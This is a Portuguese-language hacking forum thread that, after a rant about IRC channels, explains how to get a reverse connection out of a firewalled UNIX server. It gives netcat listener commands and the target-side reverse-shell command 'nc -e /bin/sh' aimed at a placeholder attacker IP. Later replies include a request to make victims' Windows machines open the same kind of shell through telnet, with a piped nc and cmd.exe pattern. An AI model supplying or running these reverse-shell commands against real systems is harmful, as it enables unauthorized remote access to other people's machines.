Tenho um aviso para dar a alguns ditos hackers de IRC, p galera
vamo tomar consciencia, onde ja se viu, vamos tomar como exemplo o server
de irc da rede brasnet. Tem muito guri novo que vai no canal #hackers
e escreve frases assustadoras dizendo que vai queimar meu modem... bah!
Que babaquice e' essa, ou mesmo operadores que soh querem saber de zkriptz
pra mirc e pirch como se derrubar um carinha do canal com flood fosse algo fora do comum. Ta na hora dessa galera se ligar, o nivel desse tipo de
canal em servidores de irc no BR ta muito baixo ou melhor ainda, eles nem
tem nivel.
Agora pra galerinha que me odeiam, tem mais um post patrocinado pelo xurrus da dona Cida ! é noix !
A mágica do xterm é um bom ponto de partida para "atacantes", mas o que acontece quando um administrador cauteloso remove o X de seu sistema ? Remover o X de um servidor UNIX pode aumentar a segurança e um sistema UNIX. No entanto, sempre há metodos adicionais de ganhar acesso ao servidor-alvo, tal como criar um canal de retorno. Um canal de retorno é o mecanismos em que o canal de comunicação se origina no sistema-alvo, em vez de no sistema do "atacante". Lembre-se de que, em nosso cenário, "atacantes" nao conseguem obter shell interativo no sentido tradicional, pois todas as portas, exceto 80 e a 443, esta bloqueadas pelo firewall. Assim, um "atacante" precisa originar uma sessão de um servidor UNIX vulnerável para o sistema do "atacante", criando um canal de retorno.
Há alguns metodos que podem ser usados para fazer isto. No primeiro, telnet reverso, o telnet é usado para criar um canal de retorno do sistema-alvo para o sistema do "atacante". Esta tecnica é chamada de telnet reverso porque a conexão telnet se origina no sistema em que o "atacante" esta tentando ganhar acesso. A maioria dos servidores UNIX possuem um cliente telnet instalado como padrão, sendo seu uso raramente controlado. Para executar um telnet reverso, precisamos alistar o utillitario todo poderoso netcat ou nc. Como estamos fazendo telnet apartir do sistema-alvo, precisamos ativar em nosso sistema ouvidores nc que aceitem conexões telnet reversas. Precisamos executar os seguintes comandos em duas janelas separadas para receber com sucesso as conexoes telnet reversa:
[hacklab]# nc -l -n -v -p 80
listening on [any] 80
[hacklab]# nc -l -n -v -p 25
listening on [any] 25
Assegure-se de que nenhum serviço ouvindo, tal como HTTPD ou o Sendmail, esteja ligado às portas 80 ou 25, pois se um serviço ja estiver ouvindo, voce precisa-ra encerra-lo por meio do comando kill, para que o nc possa ligar a cada porta respectiva.
Uma vez que tenhamos ativado o ouvidor, precisamos executar o seguinte comando no sistema remoto:
nc -e /bin/sh ip_hacker_mal_intencionado 80
é isso ai galera. ! Bom Hacking !
Créditos :AciDmuD
Isso não seria o telnet reverso (Eu acho). Pois não usa a conexão telnet, e nem o serviço. Seria simplesmente o chamado Conexão Reversa.
HadeS
Bom pessoal.. desculpe tá postando ake depois de muuuuuuuuuiiiiiiitooooooooooo... muiiiiiiiiitooooooooooo tempo..
mas eh pq to com uma dúvida relacionada..
eh o seguinte.. eu estou com u ruindows xp ake em ksa, e to com o netcat escutando em duas portas, tal qual o krinha ali emcima falou..
no entanto.. eu gostaria ki a vitima fizesse uma conexão reversa nessas portas ki abri, só que usando o telnet do windows, pois meu alvo são máquinas windows, e não linux.. e como o nc não vem de fábrica no windows.. gostaria de saber uma forma de simular o comando que a máquina vitima teria de fazer com o netcat.. no kaso este
nc ip porta receptora | cmd.exe | nc ip porta envio
como fikaria isso, usando telnet?
ok.. vlwz.. ja agradeço \o/
??? ;)
Tem uma vídeo aula de nc muito boa...rodando por aí. Não sei se aqui no darkers, ou outro fórum....se não achar, upo pra vc. Deve estar em algum lugar aqui no HD(mas tenta achar sozinho, né?)
Dri.vicária
num me expressei direito xDD
e tenho netcat, sei configurá-lo pra uma conexão reversa
tanto do lado cliente como do lado servidor
eu só queria que ao invés da vitima usar o nc...usasse o telnet
pra nao precisar instalar o netcat..
já fiz tudo usando o netcat.. mas se desse como fazer usando o telnet
fikaria mais r000x e easy pro meu lado xD~
sakou?